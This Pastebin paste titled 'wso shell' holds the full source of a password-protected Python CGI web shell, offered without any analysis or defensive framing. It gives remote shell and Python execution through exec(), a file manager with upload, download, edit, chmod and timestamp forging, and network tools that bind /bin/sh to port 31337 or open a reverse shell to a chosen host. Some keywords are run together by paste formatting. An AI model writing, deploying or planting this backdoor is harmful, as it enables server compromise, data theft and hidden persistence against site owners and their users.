wso shell

Saint92

Mar 28th, 2016

771

Never

Add comment

Not a member of Pastebin yet?Sign Up, it unlocks many cool features!

Python 20.59 KB | None | 0 0

raw download clone embed print report

#!/usr/bin/env python
importsys,os,cgi,commands,time,Cookie,socket
fromstatimport *
fromdatetimeimportdatetime
sys.stderr=open(os.devnull,'w')
password ="0de664ecd2be02cdd54234a0d1229b43"
version ="0.1 [py]"
def getall(theform, nolist =False):
data ={}
for field in theform.keys():
iftype(theform[field])== type([]):
ifnot nolist:
data[field]= theform.getlist(field)
else:
data[field]= theform.getfirst(field)
elif theform[field].filename:
_FILES[field]= theform[field]
else:
data[field]= theform[field].value
return data
def escape(str):
returnstr.replace("'","\\'").replace("\r","\\r").replace("\n","\\n")
_FILES ={}
_REQUEST = getall(cgi.FieldStorage())
if _REQUEST.has_key('charset')==False:
_REQUEST['charset']="Windows-1251"
if _REQUEST.has_key('a')==False:
_REQUEST['a']="files"
if _REQUEST.has_key('c')==False:
_REQUEST['c']=os.getcwd()
if _REQUEST.has_key('p1')==False:
_REQUEST['p1']=""
if _REQUEST.has_key('p2')==False:
_REQUEST['p2']=""
if _REQUEST.has_key('p3')==False:
_REQUEST['p3']=""
_COOKIE =Cookie.SimpleCookie()
try:
_COOKIE.load(os.environ["HTTP_COOKIE"])
except:
pass
def printLogin():
_COOKIE['psswd']="";
print _COOKIE;
print"Content-type: text/html\n";
print"""<center><form method=post>Password: <input type=password name=psswd><input type=submit value='>>'></form></center>"""
exit()
if _COOKIE.has_key('psswd')andlen(_COOKIE['psswd'].value)>0 :
if _COOKIE['psswd'].value!= password:
printLogin()
elif _REQUEST.has_key('psswd'):
try:
import hashlib
psswd = hashlib.md5()
except:
importmd5
psswd =md5.new()
psswd.update(_REQUEST['psswd'])
if psswd.hexdigest()!= password:
printLogin()
else:
_COOKIE['psswd']= psswd.hexdigest()
else:
printLogin()
print _COOKIE
home_dir =os.getcwd()
try:
os.chdir(_REQUEST['c'])
exceptos.error, msg:
pass
cwd =os.getcwd();
if cwd[-1]!='/':
cwd +='/'
def printHeader():
print"Content-type: text/html\n";
print"<html><head><meta http-equiv='Content-Type' content='text/html; charset=" + _REQUEST['charset'] + "'><title>" + os.environ["SERVER_NAME"] + " - WSO " + version + """</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color:#df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,"Courier New"; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
pre,.m{font-family:Courier,Monospace;}
</style>
<script>
var c_ ='""" + escape(_REQUEST['c']) + """';
var a_ ='""" + escape(_REQUEST['a']) + """';
var p1_ ='""" + escape(_REQUEST['p1']) + """';
var p2_ ='""" + escape(_REQUEST['p2']) + """';
var p3_ ='""" + escape(_REQUEST['p3']) + """';
var charset_ ='""" + escape( _REQUEST['charset']) + """';
function g(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;
if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;
if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;
if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;
if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;
if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;
document.mf.submit();
}
</script>
<head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>"""
print'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Time:<br>Cwd:</span></td>'
print'<td><nobr>'
for x inos.uname():
sys.stdout.write(x+' ')
t =time.localtime()
print'</nobr><br>%s<br>%d-%.2d-%.2d %.2d:%.2d:%.2d <span>Server IP:</span> %s <span>Client IP:</span> %s<br>' %(commands.getoutput('id'), t[0], t[1], t[2], t[3], t[4], t[5],os.environ['SERVER_ADDR'],os.environ['REMOTE_ADDR'])
path =''
paths = cwd.split('/')
paths.pop()
for x in paths:
path += x + '/'
sys.stdout.write("""<a href="#" onclick="g('files','"""+escape(path)+"""', '', '', '')">"""+x+"""/</a>""")
print" " + permsColor(cwd),"""<a href='#' onclick="g('files','"""+ escape( home_dir ) +"""', '', '', '')">[ home ]</a>"""
charsets =['UTF-8','Windows-1251','KOI8-R','KOI8-U','cp866']
print'<td width=1 align=right><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'
for charset in charsets:
sys.stdout.write('<option value="%s" ' % charset)
if _REQUEST['charset']== charset:
sys.stdout.write('selected')
sys.stdout.write('>%s</option>' % charset)
print'</optgroup></select><br></td></tr></table><table style="border-top:2px solid #333;text-align: center;" cellpadding=3 cellspacing=0 width=100%><tr>'
for x in['Files','Console','Python','Network']:
print"<td width='100px'>[ <a href='#' onclick='g(\""+x.lower()+'", null, "", "", "")\'>'+x+'</a> ]</td>'
print'<td></td></tr></table><div style="margin:5">'
def printFooter():
ifos.access(cwd,os.W_OK):
writable ="<font color=green>[ Writeable ]</font>"
else:
writable ="<font color=red>[ Not writable ]</font>"
print"""</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style="border-top:2px solid #333;border-bottom:2px solid #333;">
<tr>
<td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value='""" + cwd + """'><input type=submit value=">>"></form></td>
<td><form onsubmit="g('fileTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
</tr>
<tr>
<td><form onsubmit="g('files',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>"""+writable+"""</td>
<td><form onsubmit="g('fileTools',null,this.f.value,'save','');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>"""+writable+"""</td>
</tr>
<tr>
<td><form onsubmit="g('console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='files'>
<input type=hidden name=c value='"""+cwd+"""'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='"""+_REQUEST['charset']+"""'>
<span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>"""+writable+"""</td>
</tr>
</table>
</div>
</body></html>"""
def viewSize(s):
if s >=1073741824:
return"%1.2f GB" % (s / 1073741824.0);
elif s >=1048576:
return"%1.2f MB" % (s / 1048576.0);
elif s >=1024:
return"%1.2f KB" % (s / 1024.0);
else:
returnstr(s) + ' B';
def perms(p):
mode =os.lstat(p)[ST_MODE]
p = mode
i="";
if(p & 0xC000)==0xC000:
i ='s'
elif(p & 0xA000)==0xA000:
i ='l'
elif(p & 0x8000)==0x8000:
i ='-'
elif(p & 0x6000)==0x6000:
i ='b'
elif(p & 0x4000)==0x4000:
i ='d'
elif(p & 0x2000)==0x2000:
i ='c'
elif(p & 0x1000)==0x1000:
i ='p'
else:
i ='u'
if p & 0x0100: i +='r'
else: i +='-'
if p & 0x0080: i +='w'
else: i +='-'
if p & 0x0040:
if p & 0x0800: i +='s'
else: i +='x'
else:
if p & 0x0800: i +='S'
else: i+='-'
if p & 0x0020: i +='r'
else: i +='-'
if p & 0x0010: i +='w'
else: i +='-'
if p & 0x0008:
if p & 0x0400: i +='s'
else: i +='x'
else:
if p & 0x0400: i +='S'
else: i +='-'
if p & 0x0004: i +='r'
else: i +='-'
if p & 0x0002: i +='w'
else: i +='-'
if p & 0x0001:
if p & 0x0200: i +='t'
else: i +='x'
else:
if p & 0x0200: i +='T'
else: i +='-'
return i;
def permsColor(path):
ifnotos.access(path,os.R_OK):
return"<font color='#FF0000'>"+perms(path)+"</font>"
elifos.access(path,os.W_OK):
return"<font color='#00BB00'>"+perms(path)+"</font>"
else:
return"<font color='white'>"+perms(path)+"</font>"
def actionConsole():
printHeader()
print"<h1>Console</h1><div class=content>"
print"""<form name="cf" onSubmit="g(null, null, this.cmd.value);return false;" style="border:1px solid #df5;background-color:#555;"><textarea class=bigarea style="border:0px;" readonly>"""
iflen(_REQUEST['p1'])>0:
print'$',cgi.escape(_REQUEST['p1'])
printcgi.escape(commands.getoutput(_REQUEST['p1']))
print'</textarea><table cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;"></td></tr></table>'
print"</form></div><script>document.cf.cmd.focus();</script>"
printFooter()
def actionFiles():
printHeader()
if _REQUEST['p1']=='uploadFile':
try:
if _FILES['f'].filename:
fn =os.path.basename(_FILES['f'].filename)
open(fn,'wb').write(_FILES['f'].file.read())
except: pass
if _REQUEST['p1']=='mkdir':
try: os.mkdir(_REQUEST['p2'])
except: pass
print"<h1>File manager</h1><div class=content>"
item_stat =os.lstat('..')
def dirItemInfo(name, item_stat):
if S_ISLNK(item_stat[ST_MODE]):
type="link"
else:
type="dir"
tmp ={
'name' : name,
'path' : os.path.join(cwd, name),
'size' : viewSize(item_stat[ST_SIZE]),
'mtime' : datetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S"),
'uid' : str(item_stat[ST_UID]),
'gid' : str(item_stat[ST_GID]),
'perms' : permsColor(name),
'type' : type
}
return tmp
dirs =[dirItemInfo('..',os.lstat('..'))]
files =[]
for item inos.listdir(cwd):
item_stat =os.lstat(item)
mode = item_stat[ST_MODE]
tmp = dirItemInfo(item, item_stat)
if S_ISLNK(mode)or S_ISDIR(mode):
dirs.append(tmp)
elif S_ISREG(mode):
files.append(tmp)
print"<table width='100%' class='main' cellspacing='0' cellpadding='2'><form method='post'>"
print"""<tr><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>""";
def sort(a, b):
returncmp(a['name'].lower(), b['name'].lower())
line =0
for item insorted(dirs, sort):
print"<tr"
if line:
print" class=l1"
print"><td><a href='#' onclick='g(null,\""+escape(item['path'])+"\")'><b>[ "+cgi.escape(item['name'])+" ]</b></a></td><td>"+item['type']+"</td><td>"+item['mtime']+"</td><td>"+item['uid']+"/"+item['gid']+"</td><td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'chmod')\">"+item['perms']+"</a></td>"
print"<td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'rename')\">R</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'touch')\">T</a></td></tr>"
line =(line + 1)%2
for item insorted(files, sort):
print"<tr"
if line:
print" class=l1"
print"><td><a href='#' onclick='g(\"fileTools\",null,\""+escape(item['name'])+"\")'>"+cgi.escape(item['name'])+"</a></td><td>"+item['size']+"</td><td>"+item['mtime']+"</td><td>"+item['uid']+"/"+item['gid']+"</td><td><a href=# onclick=\"g('fileTools', null, '"+escape(item['path'])+"', 'chmod')\">"+item['perms']+"</a></td>"
print"<td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'rename')\">R</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'touch')\">T</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'edit')\">E</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'download')\">D</a></td></tr>"
line =(line + 1)%2
print"</form></table></div>"
printFooter()
def actionFileTools():
if _REQUEST['p2']=="":
_REQUEST['p2']="view"
if _REQUEST['p2']=="download":
print"Content-Disposition: attachment; filename=" + os.path.basename(_REQUEST['p1']) + "\n"
try:
fp =open(_REQUEST['p1'],'rb')
for x in fp.readlines():
sys.stdout.write(x)
fp.close()
except: pass
return
if _REQUEST['p2']=="save":
try:
fp =open(_REQUEST['p1'],'w')
fp.write(_REQUEST['p3'])
fp.close()
except: pass
_REQUEST['p2']='edit'
printHeader()
print"<h1>File tools</h1><div class=content>"
item_stat =os.stat(_REQUEST['p1'])
print"<span>File: </span>" + os.path.basename(_REQUEST['p1']) + " <span>Size: </span> " +viewSize(item_stat[ST_SIZE]) + " <span>Permission:</span> " +permsColor(_REQUEST['p1'])
print"<br/>"
if S_ISDIR(item_stat[ST_MODE]):
menu =['Chmod','Rename','Touch']
else:
menu =['View','Download','Edit','Chmod','Rename','Touch']
for x in menu:
print"<a href=# onclick=\"g(null, null, null, '"+x.lower()+"')\">"
if x.lower()== _REQUEST['p2']:
print"<b>[ " + x + " ]</b>"
else:
print x
print"</a> "
print"<br><br>";
if _REQUEST['p2']=="view":
try:
fp =open(_REQUEST['p1'],'r')
print"<pre class=ml1>"
for x in fp.readlines():
sys.stdout.write(cgi.escape(x))
fp.close()
print"</pre>"
except:
print"Can't open file! "+_REQUEST['p1']
if _REQUEST['p2']=="edit":
try:
fp =open(_REQUEST['p1'],'r')
print"<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'save', this.f.value);return false;\"><textarea name=f class=bigarea>"
for x in fp.readlines():
sys.stdout.write(cgi.escape(x))
fp.close()
print"</textarea><input type='submit' value='>>'></form>"
except:
print"Can't open (create) file! "+_REQUEST['p1']
if _REQUEST['p2']=="chmod":
importstat,string
iflen(_REQUEST['p3']):
perm =string.atoi(_REQUEST['p3'],8)
try:
os.chmod(_REQUEST['p1'], perm)
print"Done"
except: print"Fail!"
print"<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'chmod', this.p.value);return false;\"><input type='text' name='p' value='"
print"%o" % stat.S_IMODE(os.stat(_REQUEST['p1'])[ST_MODE])
print"'/><input type='submit' value='>>'></form>"
if _REQUEST['p2']=="rename":
iflen(_REQUEST['p3']):
try:
os.rename(_REQUEST['p1'], _REQUEST['p3'])
_REQUEST['p1']= _REQUEST['p3']
print"Done<script>p2_='" + escape(_REQUEST['p3']) + "'</script>"
except: print"Fail!"
print"<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'rename', this.n.value);return false;\"><input type='text' name='n' value='" + escape(_REQUEST['p1'])+ "'/><input type='submit' value='>>'></form>"
if _REQUEST['p2']=="touch":
iflen(_REQUEST['p3']):
try:
tmstmp =time.mktime(time.strptime(_REQUEST['p3'],"%Y-%m-%d %H:%M:%S"))
os.utime(_REQUEST['p1'],(tmstmp, tmstmp))
item_stat =os.stat(_REQUEST['p1'])
print"Done"
except: print"Fail!"
print"<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'touch', this.n.value);return false;\"><input type='text' name='n' value='"
printdatetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S")
print"'/><input type='submit' value='>>'></form>"
print"</div>"
printFooter()
def actionPython():
printHeader()
print"<h1>Exec python code</h1><div class=content>"
print"""<form name="cf" onSubmit="g(null, null, this.c.value);return false;"><textarea class=bigarea name=c>"""
print'</textarea><input type=submit value=">>">'
iflen(_REQUEST['p1'])>0:
print'<pre class="ml1" style="margin-top:5px;">'
try:
importStringIO
old_stdout =sys.stdout
sys.stdout=StringIO.StringIO()
exec(_REQUEST['p1'])
data =sys.stdout.getvalue()
sys.stdout= old_stdout
printcgi.escape(data)
except:
pass
print'</pre>'
print"</form></div>"
printFooter()
def actionNetwork():
printHeader()
print"""<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit="g(null,null,'bp',this.port.value);return false;">
<span>Bind port to /bin/sh</span><br/>
Port: <input type='text' name='port' value='31337'><input type=submit value=">>">
</form>
<form name='nfp' onSubmit="g(null,null,'bc',this.server.value,this.port.value);return false;">
<span>Back-connect to</span><br/>
Server: <input type='text' name='server' value='"""+os.environ['REMOTE_ADDR']+"""'> Port: <input type='text' name='port' value='31337'><input type=submit value=">>">
</form><br>"""
if _REQUEST['p1']!="":
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.settimeout(10)
if _REQUEST['p1']=="bp":
try:
sock.bind(('localhost',int(_REQUEST['p2'])))
sock.listen(0)
except:
print"error"
else:
print"done"
ifos.fork()!=0:
(c,addr)=sock.accept()
os.dup2(c.fileno(),0)
os.dup2(c.fileno(),1)
os.dup2(c.fileno(),2)
os.system('/bin/sh -i')
c.shutdown(2)
sock.shutdown(2)
elif _REQUEST['p1']=="bc":
try:
sock.connect((_REQUEST['p2'],int(_REQUEST['p3'])))
except:
print"error"
else:
print"done"
ifos.fork()!=0:
os.dup2(sock.fileno(),0)
os.dup2(sock.fileno(),1)
os.dup2(sock.fileno(),2)
os.system('/bin/sh -i')
sock.shutdown(2)
print"</div>"
printFooter()
try:
{
'files' : actionFiles,
'fileTools' : actionFileTools,
'console' : actionConsole,
'python' : actionPython,
'network' : actionNetwork
}[_REQUEST['a']]()
exceptKeyError:
printHeader()
printFooter()

Add Comment

Please, Sign In to add comment